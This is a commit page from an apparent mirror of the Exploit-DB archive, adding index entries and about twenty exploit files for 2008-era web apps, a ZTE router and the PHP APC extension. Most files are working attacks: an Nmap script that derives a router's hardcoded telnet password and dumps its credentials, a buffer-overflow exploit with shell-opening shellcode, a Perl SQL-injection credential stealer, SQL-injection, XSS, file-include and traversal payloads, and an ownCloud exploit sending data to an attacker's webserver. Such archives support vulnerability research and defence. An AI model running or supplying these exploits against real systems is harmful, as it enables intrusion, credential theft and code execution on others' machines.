bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 02_11_2014

Browse source
This commit is contained in:
Offensive Security 2014-02-11 04:27:22 +00:00
parent 97ddd98874
commit f413cbf3cd
22 changed files with 665 additions and 12 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

20
files.csv
View file

@ -28324,3 +28324,23 @@ id,file,description,date,author,platform,type,port
31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80
31521,platforms/php/webapps/31521.txt,"doorGets CMS 5.2 - SQL Injection Vulnerability",2014-02-07,"High-Tech Bridge SA",php,webapps,80
31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash PoC",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80
31527,platforms/hardware/webapps/31527.nse,"ZTE ZXV10 W300 Router - Hardcoded Credentials",2014-02-09,"Cesar Neira",hardware,webapps,80
31528,platforms/php/webapps/31528.txt,"Le Forum 'Fichier_Acceuil' Parameter Remote File Include Vulnerability",2008-03-24,ZoRLu,php,webapps,0
31529,platforms/php/webapps/31529.txt,"Joomla! and Mambo Cinema Component 1.0 'id' Parameter SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0
31530,platforms/php/webapps/31530.txt,"Joomla! and Mambo Download3000 Component 1.0 'id' Parameter SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0
31531,platforms/php/webapps/31531.pl,"Bomba Haber 2.0 'haberoku.php' SQL Injection Vulnerability",2008-03-25,cOndemned,php,webapps,0
31532,platforms/php/webapps/31532.txt,"Clever Copy 3.0 'postview.php' SQL Injection Vulnerability",2008-03-25,U238,php,webapps,0
31533,platforms/novell/remote/31533.txt,"Novell eDirectory 8.x eMBox Utility 'edirutil' Command Unspecified Vulnerability",2008-03-25,"Nicholas Gregorie",novell,remote,0
31534,platforms/windows/remote/31534.html,"LEADTOOLS Multimedia 15 'LTMM15.DLL' ActiveX Control Arbitrary File Overwrite Vulnerabilities",2008-03-25,shinnai,windows,remote,0
31535,platforms/php/webapps/31535.txt,"phpBB PJIRC Module 0.5 'irc.php' Local File Include Vulnerability",2008-03-25,0in,php,webapps,0
31536,platforms/windows/remote/31536.txt,"File Transfer 1.2 Request File Directory Traversal Vulnerability",2007-11-10,teeed,windows,remote,0
31537,platforms/cgi/webapps/31537.txt,"Blackboard Academic Suite 6/7 webapps/blackboard/execute/viewCatalog searchText Parameter XSS",2008-03-26,Knight4vn,cgi,webapps,0
31538,platforms/cgi/webapps/31538.txt,"Blackboard Academic Suite 6/7 bin/common/announcement.pl data__announcements___pk1_pk2__subject Parameter XSS",2008-03-26,Knight4vn,cgi,webapps,0
31539,platforms/php/webapps/31539.txt,"phpAddressBook 2.0 'index.php' SQL Injection Vulnerability",2008-03-26,"Virangar Security",php,webapps,0
31540,platforms/linux/remote/31540.php,"PECL 3.0.x Alternative PHP Cache Extension 'apc_search_paths()' Buffer Overflow Vulnerability",2008-03-26,dannyp,linux,remote,0
31541,platforms/php/webapps/31541.html,"Invision Power Board 2.x 'Signature' iFrame Security Vulnerability",2008-03-26,SHAHEE_MIRZA,php,webapps,0
31543,platforms/php/webapps/31543.txt,"GeeCarts show.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0
31544,platforms/php/webapps/31544.txt,"GeeCarts search.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0
31545,platforms/php/webapps/31545.txt,"GeeCarts view.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0
31546,platforms/asp/webapps/31546.txt,"DigiDomain 2.2 lookup_result.asp domain Parameter XSS",2008-03-27,Linux_Drox,asp,webapps,0
31547,platforms/asp/webapps/31547.txt,"DigiDomain 2.2 suggest_result.asp Multiple Parameter XSS",2008-03-27,Linux_Drox,asp,webapps,0

Can't render this file because it is too large.

9
platforms/asp/webapps/31546.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28475/info
DigiDomain is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
DigiDomain 2.2 is vulnerable; other versions may also be affected.
http://www.example.com/lookup/lookup_result.asp?domain=[XSS]&tld=.com

9
platforms/asp/webapps/31547.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28475/info
DigiDomain is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
DigiDomain 2.2 is vulnerable; other versions may also be affected.
http://www.www.example.com/lookup/suggest_result.asp?domain=.com&tld=&user=&selecte=1&word1=[XSS]&word2=[XSS]

9
platforms/cgi/webapps/31537.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28455/info
Blackboard Academic Suite is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Blackboard versions prior to 6.3.1.683, 7.0.404.58, 7.1.467.35, 7.2.383.45, and 7.3.216.0 are vulnerable.
http://www.example.com/webapps/blackboard/execute/viewCatalog?type=Course&searchText=?><script>alert(?xss?)</script>

9
platforms/cgi/webapps/31538.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28455/info
Blackboard Academic Suite is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Blackboard versions prior to 6.3.1.683, 7.0.404.58, 7.1.467.35, 7.2.383.45, and 7.3.216.0 are vulnerable.
http://www.example.com/bin/common/announcement.pl?action=ADD&course_id=_137839_1&render_type=EDITABLE&context=course<input type="text" name="data__announcements___pk1_pk2__subject"value=?<script>alert(?worm activated!?)</script>? />

258
platforms/hardware/webapps/31527.nse Executable file
View file

@ -0,0 +1,258 @@
# Exploit Title: ZTE ZXV10 W300 router contains hardcoded credentials
# Date: 03 Feb 2014
# Exploit Author: Cesar Neira
# Vendor Homepage: http://wwwen.zte.com.cn/
# Version: ZTE ZXV10 W300 v2.1
# CVE : CVE-2014-0329
# Dork (Shodan): Basic realm="index.htm"
# References:
http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html
local nmap = require "nmap"
local stdnse = require "stdnse"
local snmp = require "snmp"
local vulns = require "vulns"
description = [[
ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the
telnet service on the device. The username is "admin" and the password is
"XXXXairocon" where "XXXX" is the last four characters of the device's MAC
address. The MAC address is obtainable over SNMP with community string public.
]]
author = "Cesar Neira"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln", "exploit", "intrusive"}
---
--
-- @usage nmap -sU -sS -p U:161,T:23 --script=airocon example.org
-- @output
-- PORT STATE SERVICE
-- 23/tcp open telnet
-- 161/udp open|filtered snmp
--
-- Host script results:
-- | airocon:
-- | VULNERABLE:
-- | ZTE ZXV10 W300 router contains hardcoded credentials
-- | State: VULNERABLE (Exploitable)
-- | IDs: CVE:CVE-2014-0329
-- | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
-- | Description:
-- | ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet
-- | service on the device. The username is "admin" and the password is "XXXXairocon"
-- | where "XXXX" is the last four characters of the device's MAC address. The MAC address
-- | is obtainable over SNMP with community string public.
-- | Disclosure date: 2014-2-3
-- | Exploit results:
-- | admin:1234
-- | support:1234
-- | admin:0E91airocon
-- | References:
-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0329
-- | http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html
-- |_ http://www.kb.cert.org/vuls/id/228886
-- @args community SNMP community (Default: public)
--
---
local DEFAULT_COMMUNITY = "public"
hostrule = function(host)
local snmp_port, telnet_port
snmp_port = nmap.get_port_state(host, {number=161, protocol="udp"})
if not snmp_port and not (snmp_port.state == "open" or snmp_port.state == "open|filtered") then
return false
end
telnet_port = nmap.get_port_state(host, {number=23, protocol="tcp"})
if not telnet_port and not telnet_port.state == "open" then
return false
end
return true
end
local get_mac = function(host, community)
local socket, status, response
socket = nmap.new_socket("udp")
socket:set_timeout(5000)
status, response = socket:connect(host, 161)
if not status then
socket:close()
return status, response
end
local payload, request
request = snmp.buildGetRequest({}, ".1.3.6.1.2.1.2.2.1.6.10000")
payload = snmp.encode(snmp.buildPacket(request, 0, community))
status, response = socket:send(payload)
if not status then
socket:close()
return status, response
end
status, response = socket:receive_bytes(1)
if not status then
socket:close()
return status, response
end
socket:close()
local result
result = snmp.fetchFirst(response)
if not result then
return false, "Unexpected response value."
end
return true, stdnse.tohex(result)
end
local dump_creds = function(host, user, password)
local socket, status, response
socket = nmap.new_socket("tcp")
socket:set_timeout(5000)
status, response = socket:connect(host, 23)
if not status then
socket:close()
return status, response
end
local payload
payload = user .. "\r" .. password .. "\rsh\rlogin show\rexit\r"
status, response = socket:send(payload)
if not status then
socket:close()
return status, response
end
status, response = socket:receive_buf("exit", false)
if not status then
socket:close()
return status, response
end
socket:close()
return true, response
end
local parse_response = function(response)
local index
index = string.find(response, "Username +Password +Priority")
if not index then
return false, "Unexpected response value."
end
index = string.find(response, "\r\n", index) + 2
response = string.sub(response, index)
local result, endl, line
result = {}
index = 0
endl = string.find(response, "\r\n", index)
while endl do
line = string.sub(response, index, endl)
line = string.gsub(line, "\r", "")
line = string.gsub(line, "^ +", "")
line = string.gsub(line, " +$", "")
line = string.gsub(line, " +", " ")
local user, pass, prio
for user, pass, prio in string.gmatch(line, "([^ ]+) ([^ ]+) ([^ ]+)") do
local aux = {}
aux['username'] = user
aux['password'] = pass
aux['priority'] = prio
table.insert(result, aux)
end
index = endl + 2
endl = string.find(response, "\r\n", index)
end
return true, result
end
action = function(host)
local vuln = {
title = "ZTE ZXV10 W300 router contains hardcoded credentials",
state = vulns.STATE.NOT_VULN,
IDS = {CVE = 'CVE-2014-0329'},
risk_factor = "High",
scores = {
CVSSv2 = "9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)",
},
description = [[
ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet
service on the device. The username is "admin" and the password is "XXXXairocon"
where "XXXX" is the last four characters of the device's MAC address. The MAC address
is obtainable over SNMP with community string public.]],
references = {
"http://www.kb.cert.org/vuls/id/228886",
"http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html"
},
dates = {
disclosure = {year = 2014, month = 2, day = 3},
},
exploit_results = {},
}
local community
community = stdnse.get_script_args(SCRIPT_NAME .. ".community") or DEFAULT_COMMUNITY
local status, response
status, response = get_mac(host, community)
if not status then
return response
end
local password
password = string.upper(string.sub(response, 9)) .. "airocon"
status, response = dump_creds(host, "admin", password)
if not status then
return response
end
status, response = parse_response( response )
if not status then
return response
end
vuln.state = vulns.STATE.EXPLOIT
for _, data in pairs(response) do
table.insert(vuln.exploit_results, data.username .. ":" .. data.password)
end
return vulns.Report:new(SCRIPT_NAME, host):make_output(vuln)
end

144
platforms/linux/remote/31540.php Executable file
View file

@ -0,0 +1,144 @@
source: http://www.securityfocus.com/bid/28457/info
PECL Alternative PHP Cache (APC) extension is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Versions prior to APC 3.0.17 are affected.
<?php
/*
* apcsmash.php: PHP-APC-Stacksmash
*
* (c) 2008 dannyp <daniel@papasian.org>
* Feel free to redistribute in any form as long as you leave this
notice intact.
*
* WHAT IS THIS? Code that can run server-side and exploit a flaw in
PHP-APC 3.0.11-3.0.16
* to set up a reverse shell running as the same user that apache runs
under.
*
* WHAT SYSTEMS ARE VULNERABLE? Any system running PHP with APC 3.0.11
through CVS as of
* March 22nd, 2008 (this includes 3.0.16) is vulnerable. This exploit
was written
* specifically to target the case of PHP being ran by the webserver via
mod_php, and
* there is included shellcode for x86 Linux and x86 FreeBSD.
*
* HOW DO I GET IT TO WORK? This is not a script that will work for
scriptkiddies, or
* anyone lacking understanding of buffer overflow exploits. Under
Linux, it appears that
* the APC module gets loaded at a different location each time apache
is started, so you
* need to figure out what the return address is (RETADDR below) and
fill it in. Make sure
* you keep byteorder straight (i.e. on an x86 platform, if you want to
jump to 0xbfa784f8
* you need to have a RETADDR of \xa7\xbf\xf8\x84.
*
* WELL HOW THE HECK DO I DO THAT? The easiest way to figure out the
return address in
* is to attach gdb to one of the apache children, break it on the
exploited function
* in apc.c, and find the address of fileinfo->fullpath and then add a
bit to it so you
* land in the NOOP padding.
*
* WILL YOU HELP ME? I won't help you break into any systems that
aren't yours, so
* no, please don't contact me for technical support for this script. I
do consulting
* work, however, and my rates are very reasonable.
*
* WHAT IF I CANT DO THAT? Well, if you can't do that you're probably
not working on
* a machine that you have permission to be doing this sort of thing
against, so you should
* really consider buggering off
*
* BUT DOESNT THAT MAKE THIS VULNERABILITY HARMLESS? No, it certainly
doesn't, because
* apache has a (good) habit of respawning itself, so if you needed to
exploit the
* vulnerability without the privilege of being able to attach a
debugger to apache,
* you can just brute force it. The easiest way to do that would be to
have the return
* address be passed to this script via a $_GET variable, and then set
some script up
* to loop through the values you need to try. As you increase the
amount of pre-shellcode
* nooop padding, this actually becomes an easier and easier task, as
you can jump quite
* a bit on each try.
*
* SO IS THIS EXPLOIT USELESS IF I CANT RUN PHP ON THE TARGET MACHINE?
Yes.
*
* SO IS THIS VULNERABILITY USELESS IF I CANT RUN PHP ON THE TARGET?
No! This vulnerability
* opens people up to real attack in any case where include() and
friends are called with
* user input. This is a SUPER-set of a well known class of
vulnerabilities in PHP
* scripts called remote file inclusion (RFI) vulnerabilities. Standard
RFI vulnerabilities
* are easily mitigated by allow_url_fopen being turned off and (to deal
with NULs) magic
* quotes turned on. This attack vector requires neither!
*
* TELL ME MORE ABOUT THE SHELLCODE. The Linux shellcode is courtesy
http://shellcode.org/Shellcode/linux/bind/
* and launches a reverse shell on port 20000. The FreeBSD shellcode is
the author's own,
* and it doesn't properly initalize a sockaddr_in so it will bind to a
different port at different
* times (this is to be considered a feature, not a bug) but will
consistently take a port above 1024.
*/
// Delete this line, or you'll surely be disappointed. I don't plan on
this being used as an RFI payload...
exit();
// Set the system you're trying to target here
$system = 'Linux';
if($system == 'FreeBSD') {
/* How many NOOPs to write before the shellcode */
define('PREPAD', 400);
define('SHELLCODE',
"\x31\xc0\x50\xeb\x7d\xcd\x80\xc3\x5b\xb0\x17\xe8\xf5\xff\xff\xff\x31\xc0\x88\x43\x07\x88\x43\x0b\x89\x43\x10\x40\x50\x40\x50\xb0\x61\xe8\xdf\xff\xff\xff\x89\xc1\xb2\x10\x52\x8d\x53\x0c\x52\x50\xb0\x68\xe8\xce\xff\xff\xff\xb0\x6a\xe8\xc7\xff\xff\xff\x31\xc0\x50\x50\x51\xb0\x1e\xe8\xbb\xff\xff\xff\x89\xc2\x5a\x50\x31\xd2\xb2\x03\xb0\x5a\xe8\xac\xff\xff\xff\x66\xff\x44\x24\x04\xfe\xca\x75\xf0\xb0\x02\xe8\x9c\xff\xff\xff\x85\xc0\x75\xd1\x31\xc9\x8d\x43\x08\x51\x50\x89\xe0\x50\x50\x53\x31\xc0\xb0\x3b\xe8\x83\xff\xff\xff\xe8\x81\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x2d\x69\x20\x58\x80\x80\xa7\x22\xff\xff\xef\x1d\xff\xff\xef\x1d\x1d");
/* Our target return address */
define ('RETADDR', "\xbf\xbf\xb8\xc5");
/* Padding after the shellcode and before the return address,
for alignment purposes */
define ('POSTPAD', 12);
} else {
define('PREPAD', 4000);
define('SHELLCODE',"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x4e\x20\x43\x66\x53\x89\xe1\xb0\xef\xf6\xd0\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\x43\x43\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x53\x89\xe1\xb0\xf4\xf6\xd0\xcd\x80");
define ('POSTPAD', 17);
define ('RETADDR', "\xa7\xbf\xf8\x84");
}
define ('RETADDRCOUNT', 500);
$string = "";
for($i = 0; $i < PREPAD; ++$i) {
$string .= "\x90";
}
$string .= SHELLCODE;
for($i = 0; $i < POSTPAD; ++$i) {
$string .= "\x90";
}
for($i = 0; $i < RETADDRCOUNT; ++$i) {
$string .= RETADDR;
}
// At this point you could print the string out and use it to attack
remote scripts, if you wanted.
include($string);

10
platforms/novell/remote/31533.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/28441/info
Novell eDirectory is prone to an unspecified vulnerability that can result in unauthorized file access or a denial of service.
Unauthenticated attackers can exploit this issue.
This issue affects eDirectory 8.8 (and earlier) as well as 8.7.3.9 (and earlier).
java -cp eMBoxClient.jar embox -i
login -s edir_ip_address -p port (port can be 8008, 8009, 80, 443, 8030)

19
platforms/php/webapps/31427.txt
View file

@ -10,13 +10,9 @@
# Vendor fixed: January 22th, 2014
# CVE assignment: CVE-2014-1665
A malicious ownCloud user can upload a file with JavaScript code in the filename, share it, and
cause a XSS attack when the victim tries to either view the contents of the file or delete the
file.
A malicious ownCloud user can upload a file with JavaScript code in the filename, share it, and cause a XSS attack when the victim tries to either view the contents of the file or delete the file.
If the victim is an ownCloud administrator, an attacker can force the mounting of the webserver's
local file system, leading to unauthorized access to server resources and potentially shell
access.
If the victim is an ownCloud administrator, an attacker can force the mounting of the webserver's local file system, leading to unauthorized access to server resources and potentially shell access.
=======================
=Proof of Concept.....=
@ -38,6 +34,7 @@ Both a) and b) options will result in Javascript being executed in the victim's
** **
** NOTE: Replace [ATTACKER'S WEBSERVER] with the attacker's domain/IP. **
** NOTE: Replace [ATTACKER] with the attacker's account on ownCloud. **
** NOTE: Replace [VICTIM] with the victim's ownCloud domain/IP. **
** **
@ -53,8 +50,7 @@ document.location='http://[ATTACKER'S WEBSERVER]/ownCloudhack.php?rt='+z";>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>OwnCloud 6.0.0a XSS and CSRF Protection Bypass</title>
<script type="text/javascript"
src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<span id="container"></span>
@ -72,13 +68,12 @@ src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
event.preventDefault();
$.ajax({
type: 'POST',
url: 'http://[ATTACKER'S WEBSERVER]/index.php/apps/files_external/ajax/addMountPoint.php',
url: 'http://[VICTIM]/index.php/apps/files_external/ajax/addMountPoint.php',
data: $(this).serialize(),
xhrFields: {
withCredentials: true
},
dataType: 'json',
}
});
});
</script>
@ -92,7 +87,7 @@ src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
event.preventDefault();
$.ajax({
type: 'POST',
url: 'http://[ATTACKER'S WEBSERVER]/index.php/settings/ajax/enableapp.php',
url: 'http://[VICTIM]/index.php/settings/ajax/enableapp.php',
data: $(this).serialize(),
xhrFields: {
withCredentials: true
@ -110,7 +105,7 @@ src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
$("#container").text("Mounting the root filesystem...");
};
function redirect() {
window.location.href = 'http://[ATTACKER'S WEBSERVER]/';
window.location.href = 'http://[VICTIM]/';
$("#container").text("Redirecting back home ;)");
};
setTimeout(function() {ext();}, 0);

7
platforms/php/webapps/31528.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28423/info
Le Forum is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/forum_path/fora-acc.php3?Fichier_Acceuil=ZoRLu.txt?

10
platforms/php/webapps/31529.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/28427/info
The Cinema component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects Cinema 1.0; other versions may also be vulnerable.
http://www.example.com/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/*
http://www.example.com/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(username,0x3a,password)/**/from/**/jos_users/*

9
platforms/php/webapps/31530.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28428/info
The Download3000 component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects Download3000 1.0; other versions may also be vulnerable.
http://www.example.com/index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*

47
platforms/php/webapps/31531.pl Executable file
View file

@ -0,0 +1,47 @@
source: http://www.securityfocus.com/bid/28435/info
Bomba Haber is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Bomba Haber 2.0 is vulnerable; other versions may also be affected.
#!D:\Perl\Bin\Perl.exe
use LWP::UserAgent;
#
# XLPortal <= 2.2.4 (search) Remote SQL Injection Exploit
# Coded by cOndemned
# Greetz : irk4z, GregStar, NoRuless, Tomu, Happy B'day Avantura ;*
#
print "\r\n[~] XLPortal <= 2.2.4 (search) Remote SQL Injection Exploit";
print "\r\n[~] Coded by cOndemned [22.03.2008]\r\n";
if (@ARGV < 2) {
print "[~] Usage : $0 <target_host> <pref>\r\n"; # default pref is xlp / xlportal
exit();
}
$head = new LWP::UserAgent;
$head->agent("Opera/9.26 (Windows NT 5.1; U; pl)");
my $request = HTTP::Request->new(POST => $ARGV[0]."/index.php");
$buff = "%27+union+select+1%2Cconcat%28user%2C0x3a%2Cpassword%29+from+".$ARGV[1]."_users+%2F*";
$request->content_type('application/x-www-form-urlencoded');
$request->content("page=Szukaj&op=Wyszukaj&query=".$buff."&section_News=1&section_Download=1&s".
"ection_Links=1&section_Articles=1&exact=any&sort=alpha&=Rozpocznij+wyszukiw".
"anie");
$response = $head->request($request);
if (($response->content =~ /([a-zA-Z]+?):([0-9,a-f]{32})/)) {
print "[+] Login : $1\r\n";
print "[+] Haslo : $2\r\n";
}
else {
print "\r\n[~] This one isn't vulnerable, or bad data was given\r\n";
exit();
}

9
platforms/php/webapps/31532.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28437/info
Clever Copy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Clever Copy 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/path/postview.php?ID='+union+select+username,concat(0x706173737764,char(58),password,0x2D2D2D,0x757365726E616D653ADA,username),1,5,username,username,6,username,username,9,username+from+cc_admin/*

8
platforms/php/webapps/31535.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/28446/info
The PJIRC module for phpBB is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
http://www.example.com/forum/irc/irc.php?phpEx=./../../../../../../etc/passwd

12
platforms/php/webapps/31539.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/28456/info
phpAddressBook is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpAddressBook 2.0 is vulnerable; other versions may also be affected.
The following proof of concept is available:
login:admin ' or 1=1/*
password:[blank]

10
platforms/php/webapps/31541.html Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/28466/info
Invision Power Board (IP.Board) is prone to a security vulnerability that can aid attackers in social-engineering attacks.
Attacker-supplied script code could exploit vulnerabilities in the user's browser or give the user a false sense of security when visiting trusted web pages, which can aid in launching further attacks.
This issue affects IP.Board 2.3.1; other versions may also be affected.
<html> <head> <title>HACKED BY YOUR-NAME</title> </head> <body> <div id="iFrame1" style="position:absolute; left:0px; top:0px; z- index:0"> <iframe name="iFrame1" width=1024 height=3186 src="http://www.example.com/ YOUR-PATH/YOUR.html" scrolling="no" frameborder="0"></iframe> </div> </body> </html>

9
platforms/php/webapps/31543.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28470/info
GeeCarts is prone to multiple input-validation vulnerabilities, including remote file-include and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site; other attacks are also possible.
All versions of GeeCarts are reported vulnerable.
http://www.example.com/show.php?id=[XSS or RFI]

9
platforms/php/webapps/31544.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28470/info
GeeCarts is prone to multiple input-validation vulnerabilities, including remote file-include and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site; other attacks are also possible.
All versions of GeeCarts are reported vulnerable.
http://www.example.com/search.php?id=[XSS or RFI]

9
platforms/php/webapps/31545.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28470/info
GeeCarts is prone to multiple input-validation vulnerabilities, including remote file-include and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site; other attacks are also possible.
All versions of GeeCarts are reported vulnerable.
http://www.example.com/view.php?id=[XSS or RFI]

42
platforms/windows/remote/31534.html Executable file
View file

@ -0,0 +1,42 @@
source: http://www.securityfocus.com/bid/28442/info
LEADTOOLS Multimedia is prone to multiple vulnerabilities that allow attackers to overwrite arbitrary files. These issues affect multiple ActiveX controls.
An attacker can exploit these issues by enticing an unsuspecting victim to view a malicious HTML page.
Successfully exploiting these issues will allow the attacker to corrupt and overwrite arbitrary files on the victim's computer in the context of the vulnerable application using the ActiveX control (typically Internet Explorer).
LEADTOOLS Multimedia 15 is vulnerable; other versions may also be affected.
<pre>
<code><span style="font: 10pt Courier New;"><span
class="general1-symbol"><body
bgcolor="#E0E0E0">--------------------------------------------------------------------
<b>LEADTOOLS Multimedia Toolkit 15 Arbitrary Files Overwrite</b>
url: http://www.leadtools.com
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
<b><font color=&#039;red&#039;>This was written for educational purpose. Use it
at your own risk.
Author will be not responsible for any damage.</font></b>
--------------------------------------------------------------------
&lt;object classid=&#039;clsid:00150B1A-B1BA-11CE-ABC6-F5B2E79D9E3F&#039;
id=&#039;test&#039;&gt;&lt;/object&gt;
&lt;input language=VBScript onclick=tryMe() type=button value=&#039;Click
here to start the test&#039;&gt;
&lt;script language=&#039;vbscript&#039;&gt;
Sub tryMe
test.SaveSettingsToFile &quot;c:\windows\system_.ini&quot;, 1
MsgBox &quot;Exploit completed!&quot;
End Sub
&lt;/script&gt;
</span></span>
</code></pre>

9
platforms/windows/remote/31536.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28453/info
File Transfer is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue allows an attacker to access arbitrary files outside of the application's root directory. This can expose sensitive information that could help the attacker launch further attacks.
This issue affects versions prior to File Transfer 1.2f.
../../../../../../../boot.ini